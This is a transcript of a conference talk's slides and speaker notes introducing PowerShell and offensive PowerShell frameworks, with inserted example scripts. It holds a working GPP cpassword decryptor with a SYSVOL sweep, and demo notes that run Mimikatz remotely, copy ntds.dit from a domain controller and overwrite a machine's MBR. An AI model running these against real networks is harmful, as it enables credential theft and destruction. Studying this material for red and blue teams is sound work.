This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
2. PS C:\> WHOAMI
Jared Haight
Security Engineer with the CLT team at Gotham Digital Science
Former Sysadmin
Hobbyist Developer
Corgi Enthusiast
@jaredhaight
3. WHY ARE WE HERE?
I think PowerShell is pretty awesome
I want you to think PowerShell is pretty awesome
I’m going to give you a bunch of reasons that PowerShell is pretty awesome
6. RED TEAMS
PowerShell is what the admins use to manage their infrastructure
Microsoft is pushing more and more tasks into PowerShell
Standard on Windows 7 and up
Robust, object-oriented scripting language with access to a wide range of things on the computer
Access to the entire .NET and WMI frameworks
Lots of very interesting offensive projects going on
Blue Teams aren’t typically looking for it (PowerShell 5’s script block logging, event ID 4104, gives them something to look at)
7. BLUE TEAMS
It’s what the bad guys use, and not just pentesters: real attackers (see the Deep Panda and APT 29 notes below)
There’s some really cool DFIR stuff going on with PowerShell
8. WHAT DO I NEED TO KNOW
TO USE POWERSHELL?
Scripting for people whose idea of server administration is next > next > finish
9. VOCABULARY
String – Any sequence of characters surrounded by quotation marks (single or double). Used for text.
Example: “a”, “abc”, “abc123”, “123”
Integer – A number without quotes. Used for math.
Example: 1, 2, 3, 5
Boolean – True or False, represented in PS as $True or $False
Variable – A reference to a value that can be assigned and changed over the course of a script/program. Written in PowerShell as $[word], e.g. $foo
10. OBJECTS
An object is an instance of a specific type of “something”.
As an object of that type, it carries the properties and methods defined for its type
Properties – Information about the object
Methods – Code that interacts with the object
For example, strings have a Length property and methods (ToUpper, ToLower) to change the case of their letters.
11. ARRAYS
A list of objects separated by commas
Example: “one”,”two”,”three”
You can access specific items in the array by using index numbers
Index starts at zero
12. CMDLETS
Primary way of getting things done in PowerShell
Always in a “verb-noun” format
Examples
write-host – print something to screen
get-process – get running processes
set-clipboard – copy something to clipboard
get-eventlog – get contents of eventlog
13. POWERSHELL SPECIFICS
Almost everything is tab-completable
Cmdlets
Parameters
Parameter values
PowerShell ISE
“Integrated Scripting Environment”, installed by default with PowerShell
Includes Visual Studio-like auto-completion (IntelliSense)
Sidebar featuring all available cmdlets
19. FOR LOOPS – PRACTICAL EXAMPLE OUTPUT
[...]
C:\repos
-----
BUILTIN\Administrators Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow Modify, Synchronize
NT AUTHORITY\Authenticated Users Allow -536805376
C:\Sandbox
-----
NT AUTHORITY\Authenticated Users Allow FullControl
Everyone Allow FullControl
[...]
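The loop that produced the output above is not on this page (slides 14 to 18 are missing), so here is an added example, not the deck's own code, that walks each top-level directory, calls the GetAccessControl() method the speaker notes mention, and flags ACEs that hand write rights to broad principals such as Everyone or Authenticated Users (the C:\Sandbox entries above are exactly that pattern). The function name, the $Root default and the $BroadPrincipals list are assumptions made for the example.

```powershell
function Get-DirectoryAclReport {
    [CmdletBinding()]
    param(
        [string]$Root = 'C:\',
        # Assumed list: principals that should not hold write rights on a system-root directory
        [string[]]$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
    )
    # Bits that let a principal change the directory's contents or its ACL. The named values
    # come from the FileSystemRights enum; 0x10000000 (GENERIC_ALL) and 0x40000000 (GENERIC_WRITE)
    # are generic-rights bits the enum has no name for, which is why the slide output above
    # shows one ACE as the raw integer -536805376.
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $writeBits = [int]($fsr::WriteData -bor $fsr::AppendData -bor $fsr::Delete -bor
                       $fsr::ChangePermissions -bor $fsr::TakeOwnership) -bor 0x10000000 -bor 0x40000000

    # Get-ChildItem -Directory yields System.IO.DirectoryInfo objects; GetAccessControl()
    # is the method on that object that returns the DirectorySecurity (ACL) object.
    foreach ($dir in Get-ChildItem -Path $Root -Directory -ErrorAction SilentlyContinue) {
        try { $acl = $dir.GetAccessControl() } catch { continue }   # skip directories whose ACL we cannot read
        foreach ($ace in $acl.Access) {
            $rights = [int]$ace.FileSystemRights
            $grantsWrite = ($ace.AccessControlType -eq 'Allow') -and (($rights -band $writeBits) -ne 0)
            [pscustomobject]@{
                Path      = $dir.FullName
                Identity  = $ace.IdentityReference.Value
                Type      = $ace.AccessControlType
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
                Weak      = $grantsWrite -and ($BroadPrincipals -contains $ace.IdentityReference.Value)
            }
        }
    }
}

# Usage (assumed root): show only the entries that hand write access to low-privilege principals
# Get-DirectoryAclReport -Root 'C:\' | Where-Object Weak | Format-Table Path, Identity, Rights -AutoSize
```

Emitting objects instead of Write-Host lines is what makes the result pipeable into Where-Object, Export-Csv or Compare-Object; Get-Acl would return the same DirectorySecurity object as the method call.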
20. LOGIC
Logic in programming amounts to “if foo is true, do bar”
You can compare things in PowerShell with:
-lt – Less than
-le – Less than or equal to
-eq – Equal to
-ne – Not equal to
-ge – Greater than or equal to
-gt – Greater than
21. LOGIC – IF/ELSE STATEMENTS
Code
$nums = 1,2,3,4,5,6,7,8,9,10
foreach ($num in $nums)
{
    if ($num -eq 4)
    {
        Write-Host "$num is four."
    }
    else
    {
        Write-Host "$num is not four."
    }
}
Output
1 is not four.
2 is not four.
3 is not four.
4 is four.
5 is not four.
6 is not four.
7 is not four.
8 is not four.
9 is not four.
10 is not four.
23. FIGURING STUFF OUT
Get-Command [Search term]
Example: get-command “*clipboard”
Get-Help “Command”
It gets help.
Example: get-help write-host
Example: get-help write-host –examples
Get-Member
Pipe an object to it to find out the objects properties and methods
Example: $dir | get-member
31. DOING FUN STUFF WITH
POWERSHELL
I may have a strange definition of “fun”
32. REGISTRY FUN – REGISTRY AS A DRIVE
PS C:\> cd HKCU:
PS HKCU:\> cd .\SOFTWARE
PS HKCU:\SOFTWARE> dir Micro*
Hive: HKEY_CURRENT_USER\SOFTWARE
Name Property
---- --------
Microsoft
Microsoft Corporation
Microsoft Studios
33. REGISTRY FUN – CREATING ENTRIES
# Does the key exist?
PS HKCU:\SOFTWARE> test-path "BSidesCHS"
False
# Create key
PS HKCU:\SOFTWARE> new-item "BSidesCHS"
Hive: HKEY_CURRENT_USER\SOFTWARE
Name Property
---- --------
BSidesCHS
# Create value in key
PS HKCU:\SOFTWARE> New-ItemProperty -Path .\BSidesCHS -Name Demo -PropertyType String -Value "TextGoesHere"
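The three steps above (test, create key, create value) as one idempotent function, added here as an example rather than taken from the deck: it creates the key only if missing, creates or updates the value, and reads the value back so the caller sees what is actually stored. The function name is an assumption; the key and value names mirror the slide.

```powershell
function Set-RegistryString {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,   # key path on a registry drive, e.g. HKCU:\SOFTWARE\BSidesCHS
        [Parameter(Mandatory)][string]$Name,   # value name inside that key
        [Parameter(Mandatory)][string]$Value
    )
    # In the registry provider a key is an item and a value is an item property,
    # so Test-Path / New-Item address keys and the *-ItemProperty cmdlets address values.
    if (-not (Test-Path -Path $Path)) {
        New-Item -Path $Path -Force | Out-Null          # -Force also creates missing parent keys
        $keyState = 'key created'
    } else {
        $keyState = 'key existed'
    }

    $current = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $current) {
        New-ItemProperty -Path $Path -Name $Name -PropertyType String -Value $Value | Out-Null
        $valueState = 'value created'
    } elseif ($current.$Name -ne $Value) {
        Set-ItemProperty -Path $Path -Name $Name -Value $Value    # overwrite in place; the type stays String
        $valueState = 'value updated'
    } else {
        $valueState = 'value unchanged'
    }

    # Read it back so the caller sees what is really stored, not what was intended
    [pscustomobject]@{
        Path  = $Path
        Name  = $Name
        Value = (Get-ItemProperty -Path $Path -Name $Name).$Name
        State = "$keyState, $valueState"
    }
}

# Usage, mirroring the slide, followed by cleanup of the demo key:
# Set-RegistryString -Path 'HKCU:\SOFTWARE\BSidesCHS' -Name Demo -Value 'TextGoesHere'
# Remove-Item -Path 'HKCU:\SOFTWARE\BSidesCHS' -Recurse
```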
34. REMOTE FUN
Most cmdlets that take a path understand UNC paths
test-path \\server\share\test.txt
A lot of cmdlets support the -ComputerName parameter (this goes over RPC/DCOM, not WinRM, and was dropped from the service cmdlets in PowerShell 7)
stop-service spooler -ComputerName demo-dc01
WinRM makes everything better
Microsoft’s Remote Management service
enter-pssession demo-dc01
invoke-command -ComputerName demo-dc01 -ScriptBlock { code }
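An added example of the Invoke-Command pattern above, not from the deck: it fans a script block out to a list of hosts over WinRM, carries a local value into the remote scope with -ArgumentList, records which identity the code ran as on each box, and reports hosts that could not be reached instead of silently dropping them. The function name is an assumption; the host names in the usage line are the deck's lab names and are assumed to exist.

```powershell
function Get-RemoteServiceState {
    [CmdletBinding()]
    param(
        # Target hosts, e.g. 'demo-dc01','demo-client1' (assumed lab names)
        [Parameter(Mandatory)][string[]]$ComputerName,
        [string]$ServiceName = 'spooler'
    )
    # Invoke-Command opens a WinRM session to every host and runs the script block there in
    # parallel (-ThrottleLimit caps the concurrency). The remote scope cannot see local variables,
    # so $ServiceName is handed over with -ArgumentList. -ErrorVariable collects unreachable hosts.
    $results = Invoke-Command -ComputerName $ComputerName -ThrottleLimit 32 `
        -ErrorAction SilentlyContinue -ErrorVariable remoteErrors `
        -ArgumentList $ServiceName -ScriptBlock {
            param([string]$svc)
            $s = Get-Service -Name $svc -ErrorAction SilentlyContinue
            $status = if ($s) { $s.Status.ToString() } else { 'NotInstalled' }
            [pscustomobject]@{
                Service = $svc
                Status  = $status
                # identity the command ran as on the remote side
                RunAs   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
            }
        }

    foreach ($r in $results) {
        # Objects come back deserialized; PSComputerName is stamped on each one by the remoting layer
        [pscustomobject]@{ Computer = $r.PSComputerName; Service = $r.Service; Status = $r.Status; RunAs = $r.RunAs; Error = $null }
    }
    foreach ($e in $remoteErrors) {
        # Connection failures (WinRM not listening, no rights, Kerberos name mismatch) land here instead of throwing
        [pscustomobject]@{ Computer = $e.TargetObject; Service = $ServiceName; Status = $null; RunAs = $null; Error = $e.Exception.Message }
    }
}

# Usage (assumed lab hosts):
# Get-RemoteServiceState -ComputerName 'demo-dc01','demo-client1' | Format-Table -AutoSize
```

WinRM must be enabled on the targets (Enable-PSRemoting) and, with the default Kerberos authentication, hosts have to be addressed by name rather than IP address.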
37. WHAT CAN WE BREAK?
There is a lot of really impressive work going into offensive PowerShell
frameworks.
Recon
Backdoors
Shellcode
Exfiltration
Privesc
Lots of very smart and devious people working on PowerShell frameworks
Big focus on “in memory” attacks.
Don’t touch the disk, don’t trip AV.
40. COOL THINGS IN POWERSPLOIT
Exfiltration
Invoke-NinjaCopy – Copies a file from NTFS by reading the raw volume and parsing NTFS structures (so locked files like ntds.dit can be copied)
Invoke-Mimikatz – Loads Mimikatz into memory and runs it. Doesn’t touch disk when run against a remote computer.
Get-GPPPassword – Browses Group Policy in SYSVOL and finds passwords stored in Group Policy Preferences (the cpassword attribute, encrypted with a key Microsoft published)
Code Execution
Invoke-Shellcode – Inject shellcode into a specified process
Mayhem
Set-MasterBootRecord – Writes a string to the MBR
Set-CriticalProcess – BSOD (marks the PowerShell process critical, so exiting it crashes the box)
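To make concrete what Get-GPPPassword does, here is an added example (not PowerSploit's code) of the two pieces: decrypting a Group Policy Preferences cpassword with the AES key Microsoft published in its own documentation, and sweeping SYSVOL for XML files that still carry one. Both function names and the SYSVOL path in the usage line are assumptions. The same sweep is a useful blue-team check: MS14-025 stopped Group Policy from writing new cpasswords but did not remove existing ones.

```powershell
function ConvertFrom-GPPCpassword {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP stores the password AES-256-CBC encrypted with a fixed, publicly documented key,
    # a zero IV and PKCS#7 padding, then base64-encodes it with the '=' padding stripped.
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    $padded = $Cpassword + ('=' * ((4 - $Cpassword.Length % 4) % 4))   # restore base64 padding
    $cipher = [Convert]::FromBase64String($padded)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key     = $key
        $aes.IV      = New-Object byte[] 16
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        [System.Text.Encoding]::Unicode.GetString($plain)   # the plaintext is UTF-16LE
    } finally {
        $aes.Dispose()
    }
}

function Find-GPPCpassword {
    [CmdletBinding()]
    param(
        # Policies folder in SYSVOL, e.g. \\demo.local\SYSVOL\demo.local\Policies (assumed path)
        [Parameter(Mandatory)][string]$SysvolPath
    )
    # Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml
    # are the preference files that can carry a cpassword attribute.
    Get-ChildItem -Path $SysvolPath -Recurse -Include *.xml -ErrorAction SilentlyContinue |
        Select-String -Pattern 'cpassword="([^"]+)"' |
        ForEach-Object {
            $cp = $_.Matches[0].Groups[1].Value
            [pscustomobject]@{
                File      = $_.Path
                Cpassword = $cp
                Password  = ConvertFrom-GPPCpassword -Cpassword $cp
            }
        }
}

# Usage (assumed path): any domain user can read SYSVOL, which is the whole point
# Find-GPPCpassword -SysvolPath '\\demo.local\SYSVOL\demo.local\Policies' | Format-Table -AutoSize
```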
41. VEIL POWERTOOLS
https://github.com/PowerShellEmpire/PowerTools
Part of the Empire Framework now
Components
PewPewPew – Run commands against a list of servers without touching the HDD
PowerBreach – Offers a variety of ways to trigger backdoor code
PowerPick – Allows the execution of PS code without powershell.exe
PowerUp – Assists with local escalation
PowerView – Network awareness tool
42. COOL STUFF IN POWERTOOLS
PowerView
Invoke-StealthUserHunter – Finds home directory servers and checks them for active sessions from specific user accounts
Invoke-FindLocalAdminAccess – Finds machines that the current account has admin rights on
Get-ExploitableSystems – Cross-references systems against known Metasploit exploit modules
PowerBreach
Invoke-DeadUserBackdoor – Triggers a payload if a given user account is deleted
Invoke-EventLogBackdoor – Triggers a payload if a specific user fails an RDP login
PewPewPew
Invoke-MassCommand – Runs a given command against a bunch of servers
Invoke-MassMimikatz – Runs Mimikatz against all the things.
44. COOL THINGS ABOUT NISHANG
Client
Out-Word – Creates a Word file (or infects an existing one) with a macro that downloads and runs a PowerShell script
Also see: Out-Excel, Out-HTA, Out-CHM, Out-Shortcut and Out-Java
Backdoors
DNS_Txt_Pwnage – A backdoor that receives commands through DNS TXT queries
Gupt-Backdoor – A backdoor that receives commands from WLAN SSIDs (without connecting)
45. .DESCRIPTION
Gupt looks for a specially crafted Wireless Network Name/SSID from the list of all available networks. It matches the first four characters of each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', the rest of the SSID name is considered to be a command and executed. If the 5th character is a 'u', the rest of the SSID is considered the id part of a Google URL Shortener link and a script is downloaded and executed in memory from the URL.
48. EMPIRE
http://www.powershellempire.com/
Pure PowerShell post-exploitation agent
Cryptographically secure communications
Flexible “phone-home” architecture
Think Meterpreter, but native PowerShell
Combines a lot of the modules present in other frameworks into an easy to
use reverse shell
49. USING EMPIRE
Obtain a Linux server
git clone https://github.com/powershellempire/empire && cd empire/config && ./install.sh
Setup listeners (HTTP/S endpoints) on the server
Generate launchers (PowerShell code that runs on clients that makes them phone home)
Run launchers client side
Receive shells
52. LEARNING MORE POWERSHELL
Microsoft Virtual Academy (https://mva.microsoft.com/)
Learn Windows PowerShell in a Month of Lunches (it’s a book)
Google
Get your hands dirty
Spin up a lab and play
Find stuff to PowerShellify on the job
55. THE END
Questions?
@jaredhaight
jhaight@gdssecurity.com
Charlotte Hackers – http://www.charlottehackers.com
Gotham Digital Science – http://www.gdssecurity.com
Editor’s notes (speaker notes)
This won’t be in depth
Don’t really expect people to leave here and be able to code in PS
My goal here is to show you how easy it is to get started with PS and do some really cool stuff.
Also want to highlight some of the awesome stuff going on in infosec
* I’m not a developer.
* I tend to get my vocabulary mixed up. I apologize in advance.
* The stuff I make works though, so that’s good.
Deep Panda – Attacked national security think tanks using PowerShell scheduled tasks to download and execute RATs
APT 29 – Twitter-based C2 that got PowerShell commands from tweets
Primary thing you do in PS is run cmdlets.
You can write your own cmdlets, usually written in C#
Comparisons are the same as bash
The directory object has a method called “GetAccessControl”, which returns an ACL object
Test-path for KEY
New-item for KEY
New-ItemProperty for Value
WinRM is a SOAP-based API (WS-Management) for managing Windows
WinRM is installed by default on 2008+, but must be enabled.
* Offensive community is driven by a lot of mature pentesters.
* $repo can be a folder, ps1 file or psm1 file.
* There’s a LOT to Nishang. Very active, robust framework.
Description of Gupt-Backdoor from the PS file.
Log in as helpdesk to demo-client1
Invoke-UserHunter (find MrAdmin on demo-client2)
Invoke-Mimikatz -ComputerName demo-client2
Start new PS instance as MrAdmin
Import-Module C:\repos\PowerTools\PowerView
Get-NetDomainController
Import-Module C:\repos\Powersploit
Invoke-NinjaCopy -Path C:\windows\ntds\ntds.dit -ComputerName demo-dc01 -LocalDest C:\repos
Start new admin PS instance
Import-Module C:\repos\Powersploit
Set-MasterBootRecord "l33th4x0r"
Restart-Computer
Empire is the magnum opus of offensive powershell
As part of the setup, a unique string is generated. This is used to encrypt the powershell code for the launchers
Launchers phone home (not constant connection)